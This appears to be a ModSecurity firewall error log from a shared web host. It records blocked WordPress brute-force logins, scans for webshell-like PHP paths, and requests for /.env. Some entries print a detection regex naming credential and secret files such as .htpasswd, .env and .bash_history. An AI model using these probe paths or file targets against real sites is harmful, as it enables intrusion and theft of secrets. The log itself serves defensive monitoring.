[Tue May 26 19:34:01.683575 2026] [security2:error] [pid 58470:tid 58703] [client 40.83.92.30:5342] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "aastha-enterprises.com"] [uri "/grsiuk.php"] [unique_id "ahWoUbnjVHRH3AGGvmYPqAAAAGc"]
[Tue May 26 19:34:02.656640 2026] [security2:error] [pid 58470:tid 58538] [remote 51.91.98.45:55132] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 45.98.91.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWoUrnjVHRH3AGGvmYPxwAADkM"]
[Tue May 26 19:34:02.912803 2026] [security2:error] [pid 58470:tid 58596] [remote 51.91.98.45:55132] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 45.98.91.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWoUrnjVHRH3AGGvmYP1gAACH0"], referer: https://canopykaapi.com/wp-login.php
[Tue May 26 19:34:02.953433 2026] [security2:error] [pid 58470:tid 58605] [client 40.83.92.30:5312] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aastha-enterprises.com"] [uri "/8.php"] [unique_id "ahWoUrnjVHRH3AGGvmYP1wAAAAU"]
[Tue May 26 19:34:02.953534 2026] [security2:error] [pid 58470:tid 58605] [client 40.83.92.30:5312] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "aastha-enterprises.com"] [uri "/8.php"] [unique_id "ahWoUrnjVHRH3AGGvmYP1wAAAAU"]
[Tue May 26 19:34:03.243762 2026] [security2:error] [pid 58470:tid 58606] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWoUrnjVHRH3AGGvmYP1QAAAAY"]
[Tue May 26 19:34:04.570411 2026] [security2:error] [pid 58470:tid 58610] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWoVLnjVHRH3AGGvmYQCAAAAAo"]
[Tue May 26 19:34:04.659853 2026] [security2:error] [pid 58470:tid 58659] [client 40.83.92.30:5371] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aastha-enterprises.com"] [uri "/fs.php"] [unique_id "ahWoVLnjVHRH3AGGvmYQGwAAADs"]
[Tue May 26 19:34:04.659942 2026] [security2:error] [pid 58470:tid 58659] [client 40.83.92.30:5371] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "aastha-enterprises.com"] [uri "/fs.php"] [unique_id "ahWoVLnjVHRH3AGGvmYQGwAAADs"]
[Tue May 26 19:34:06.123197 2026] [security2:error] [pid 58470:tid 58627] [client 165.231.168.101:40586] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahWoVbnjVHRH3AGGvmYQPgAAABs"], referer: https://www.cagmedya.com/web-tasarim/
[Tue May 26 19:34:06.858571 2026] [security2:error] [pid 58470:tid 58622] [client 40.83.92.30:5994] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aastha-enterprises.com"] [uri "/ws38.php"] [unique_id "ahWoVrnjVHRH3AGGvmYQZAAAABY"]
[Tue May 26 19:34:06.858689 2026] [security2:error] [pid 58470:tid 58622] [client 40.83.92.30:5994] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "aastha-enterprises.com"] [uri "/ws38.php"] [unique_id "ahWoVrnjVHRH3AGGvmYQZAAAABY"]
[Tue May 26 19:34:07.421094 2026] [security2:error] [pid 58470:tid 58667] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWoVrnjVHRH3AGGvmYQagAAAEM"]
[Tue May 26 19:34:09.210145 2026] [security2:error] [pid 58470:tid 58497] [remote 216.73.216.30:32978] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWoWbnjVHRH3AGGvmYQowAAXRo"]
[Tue May 26 19:34:09.443956 2026] [security2:error] [pid 58470:tid 58521] [remote 51.91.98.45:33136] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 45.98.91.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWoWbnjVHRH3AGGvmYQqgAANTI"]
[Tue May 26 19:34:09.447630 2026] [security2:error] [pid 58470:tid 58602] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWoWbnjVHRH3AGGvmYQnwAAAAI"]
[Tue May 26 19:34:09.840556 2026] [security2:error] [pid 58470:tid 58594] [remote 51.91.98.45:33136] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 45.98.91.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWoWbnjVHRH3AGGvmYQuQAAOXs"], referer: https://shahvishaal.moes-art.com/wp-login.php
[Tue May 26 19:34:11.325993 2026] [security2:error] [pid 58470:tid 58717] [client 202.76.167.139:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWoWrnjVHRH3AGGvmYQ2QAAAHU"]
[Tue May 26 19:34:11.814182 2026] [security2:error] [pid 58470:tid 58631] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWoW7njVHRH3AGGvmYQ4wAAAB8"]
[Tue May 26 19:34:13.757842 2026] [security2:error] [pid 58470:tid 58723] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWoXbnjVHRH3AGGvmYRHwAAAHs"]
[Tue May 26 19:34:14.152435 2026] [security2:error] [pid 58470:tid 58634] [client 193.37.33.158:45005] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 158.33.37.193.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "afstpaul.org"] [uri "/wp-login.php"] [unique_id "ahWoXbnjVHRH3AGGvmYRLgAAACI"]
[Tue May 26 19:34:14.381053 2026] [security2:error] [pid 58470:tid 58591] [remote 195.200.18.14:0] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "195.200.18.14" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "kingsclub.in"] [uri "/premium-family-club-in-bangalore/wp-comments-post.php"] [unique_id "ahWoXrnjVHRH3AGGvmYROwAAF3g"], referer: https://kingsclub.in/premium-family-club-in-bangalore/2025/07/04/hello-world/
[Tue May 26 19:34:14.381288 2026] [security2:error] [pid 58470:tid 58623] [client 195.200.18.14:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "406"] [hostname "kingsclub.in"] [uri "/premium-family-club-in-bangalore/wp-comments-post.php"] [unique_id "ahWoXrnjVHRH3AGGvmYROwAAF3g"], referer: https://kingsclub.in/premium-family-club-in-bangalore/2025/07/04/hello-world/
[Tue May 26 19:34:15.099113 2026] [security2:error] [pid 58470:tid 58490] [remote 195.200.18.14:0] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "195.200.18.14" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "kingsclub.in"] [uri "/premium-family-club-in-bangalore/wp-comments-post.php"] [unique_id "ahWoX7njVHRH3AGGvmYRTAAAYxM"], referer: https://kingsclub.in/premium-family-club-in-bangalore/2025/07/04/hello-world/
[Tue May 26 19:34:15.099311 2026] [security2:error] [pid 58470:tid 58699] [client 195.200.18.14:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "406"] [hostname "kingsclub.in"] [uri "/premium-family-club-in-bangalore/wp-comments-post.php"] [unique_id "ahWoX7njVHRH3AGGvmYRTAAAYxM"], referer: https://kingsclub.in/premium-family-club-in-bangalore/2025/07/04/hello-world/
[Tue May 26 19:34:15.299892 2026] [security2:error] [pid 58470:tid 58483] [remote 216.73.216.30:26113] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahWoX7njVHRH3AGGvmYRUwAAZww"]
[Tue May 26 19:34:15.571895 2026] [security2:error] [pid 58470:tid 58489] [remote 103.166.184.148:38280] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.184.166.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "atreegroup.com"] [uri "/wp-login.php"] [unique_id "ahWoX7njVHRH3AGGvmYRVAAADhI"]
[Tue May 26 19:34:15.671506 2026] [security2:error] [pid 58470:tid 58615] [client 8.217.191.94:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahWoX7njVHRH3AGGvmYRZAAAAA8"]
[Tue May 26 19:34:15.958605 2026] [security2:error] [pid 58470:tid 58634] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWoX7njVHRH3AGGvmYRZgAAACI"]
[Tue May 26 19:34:16.579919 2026] [security2:error] [pid 58470:tid 58493] [remote 103.166.184.148:38280] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.184.166.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "atreegroup.com"] [uri "/wp-login.php"] [unique_id "ahWoYLnjVHRH3AGGvmYRfAAAYhY"], referer: https://atreegroup.com/wp-login.php
[Tue May 26 19:34:16.836483 2026] [security2:error] [pid 58470:tid 58478] [remote 216.73.216.30:12541] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWoYLnjVHRH3AGGvmYRhwAAKAc"]
[Tue May 26 19:34:17.270294 2026] [security2:error] [pid 58470:tid 58618] [client 176.65.139.238:62074] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cariocabpo.contabilidadecarioca.com.br"] [uri "/.env"] [unique_id "ahWoYbnjVHRH3AGGvmYRmwAAABI"]
[Tue May 26 19:34:17.302557 2026] [security2:error] [pid 58470:tid 58492] [remote 85.215.36.85:47714] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 85.36.215.85.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWoYbnjVHRH3AGGvmYRmgAAcRU"]
[Tue May 26 19:34:18.225557 2026] [security2:error] [pid 58470:tid 58679] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWoYbnjVHRH3AGGvmYRrQAAAE8"]
[Tue May 26 19:34:20.692471 2026] [security2:error] [pid 58470:tid 58637] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWoZLnjVHRH3AGGvmYR7QAAACU"]
[Tue May 26 19:34:22.246007 2026] [security2:error] [pid 58470:tid 58516] [remote 93.183.94.195:0] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "93.183.94.195" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "kingsclub.in"] [uri "/premium-family-club-in-bangalore/wp-comments-post.php"] [unique_id "ahWoZrnjVHRH3AGGvmYSIgAAOi0"], referer: https://kingsclub.in/premium-family-club-in-bangalore/2025/07/04/hello-world/
[Tue May 26 19:34:22.246117 2026] [security2:error] [pid 58470:tid 58658] [client 93.183.94.195:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "406"] [hostname "kingsclub.in"] [uri "/premium-family-club-in-bangalore/wp-comments-post.php"] [unique_id "ahWoZrnjVHRH3AGGvmYSIgAAOi0"], referer: https://kingsclub.in/premium-family-club-in-bangalore/2025/07/04/hello-world/
[Tue May 26 19:34:22.555091 2026] [security2:error] [pid 58470:tid 58624] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWoZrnjVHRH3AGGvmYSIQAAABg"]
[Tue May 26 19:34:22.653396 2026] [security2:error] [pid 58470:tid 58593] [remote 93.183.94.195:0] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "93.183.94.195" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "kingsclub.in"] [uri "/premium-family-club-in-bangalore/wp-comments-post.php"] [unique_id "ahWoZrnjVHRH3AGGvmYSLwAAO3o"], referer: https://kingsclub.in/premium-family-club-in-bangalore/2025/07/04/hello-world/
[Tue May 26 19:34:22.653562 2026] [security2:error] [pid 58470:tid 58659] [client 93.183.94.195:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "406"] [hostname "kingsclub.in"] [uri "/premium-family-club-in-bangalore/wp-comments-post.php"] [unique_id "ahWoZrnjVHRH3AGGvmYSLwAAO3o"], referer: https://kingsclub.in/premium-family-club-in-bangalore/2025/07/04/hello-world/
[Tue May 26 19:34:23.992801 2026] [security2:error] [pid 58470:tid 58701] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWoZ7njVHRH3AGGvmYSVAAAAGU"]
[Tue May 26 19:34:26.540790 2026] [security2:error] [pid 58470:tid 58525] [remote 88.198.165.116:42792] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 116.165.198.88.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWoarnjVHRH3AGGvmYSpwAAfTY"]
[Tue May 26 19:34:26.916906 2026] [security2:error] [pid 58470:tid 58609] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWoarnjVHRH3AGGvmYSrQAAAAk"]
[Tue May 26 19:34:28.869705 2026] [security2:error] [pid 58470:tid 58716] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWobLnjVHRH3AGGvmYS5wAAAHQ"]
[Tue May 26 19:34:31.145747 2026] [security2:error] [pid 58470:tid 58657] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWobrnjVHRH3AGGvmYTHAAAADk"]
[Tue May 26 19:34:33.675966 2026] [security2:error] [pid 58470:tid 58727] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWocbnjVHRH3AGGvmYTagAAAH8"]
[Tue May 26 19:34:34.777281 2026] [security2:error] [pid 58470:tid 58616] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWocrnjVHRH3AGGvmYTiAAAABA"]
[Tue May 26 19:34:35.669389 2026] [security2:error] [pid 58470:tid 58639] [client 114.119.155.55:46417] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.cagmedya.com"] [uri "/referanslar/unver-design-kibris"] [unique_id "ahWoc7njVHRH3AGGvmYToQAAACc"], referer: https://www.cagmedya.com/referanslar
[Tue May 26 19:34:36.249476 2026] [security2:error] [pid 58470:tid 58608] [client 176.65.139.236:64342] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "groupemf.azurmediatec.com"] [uri "/.env"] [unique_id "ahWodLnjVHRH3AGGvmYTtAAAAAg"]
[Tue May 26 19:34:37.606019 2026] [security2:error] [pid 58470:tid 58658] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWodbnjVHRH3AGGvmYT0gAAADo"]
[Tue May 26 19:34:37.933106 2026] [security2:error] [pid 58470:tid 58625] [client 68.112.219.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWodbnjVHRH3AGGvmYT1QAAABk"]
[Tue May 26 19:34:39.950324 2026] [security2:error] [pid 58470:tid 58639] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWod7njVHRH3AGGvmYUDAAAACc"]
[Tue May 26 19:34:40.001418 2026] [security2:error] [pid 58470:tid 58577] [remote 74.7.241.58:34864] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahWoeLnjVHRH3AGGvmYUGQAASWo"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/jkjuice.com/wp-includes
[Tue May 26 19:34:40.184999 2026] [security2:error] [pid 58470:tid 58568] [remote 162.214.79.109:46122] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 109.79.214.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWoeLnjVHRH3AGGvmYUGAAAfmE"]
[Tue May 26 19:34:41.098615 2026] [security2:error] [pid 58470:tid 58572] [remote 14.161.17.36:59400] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 36.17.161.14.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWoeLnjVHRH3AGGvmYUOwAANmU"]
[Tue May 26 19:34:42.107279 2026] [security2:error] [pid 58470:tid 58671] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWoebnjVHRH3AGGvmYUVgAAAEc"]
[Tue May 26 19:34:43.411518 2026] [security2:error] [pid 58470:tid 58684] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWoe7njVHRH3AGGvmYUiwAAAFQ"]
[Tue May 26 19:34:43.976079 2026] [security2:error] [pid 58470:tid 58604] [client 2a06:98c0:3600::103:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "cagmedya.com"] [uri "/index.php"] [unique_id "ahWoe7njVHRH3AGGvmYUqAAAAAQ"]
[Tue May 26 19:34:46.285171 2026] [security2:error] [pid 58470:tid 58618] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWofbnjVHRH3AGGvmYU9AAAABI"]
[Tue May 26 19:34:48.565561 2026] [security2:error] [pid 58470:tid 58655] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWogLnjVHRH3AGGvmYVQAAAADc"]
[Tue May 26 19:34:49.203434 2026] [security2:error] [pid 58470:tid 58657] [client 104.207.51.171:17785] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.cagmedya.com"] [uri "/index.php"] [unique_id "ahWogLnjVHRH3AGGvmYVVAAAADk"], referer: https://perrettecarpetcleaning.com/s/cdn/?cagmedya.com
[Tue May 26 19:34:49.876263 2026] [security2:error] [pid 58470:tid 58672] [client 54.205.63.235:63848] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "siliconelevators.in"] [uri "/wp-admin/setup-config.php"] [unique_id "ahWogbnjVHRH3AGGvmYVeAAAAEg"]
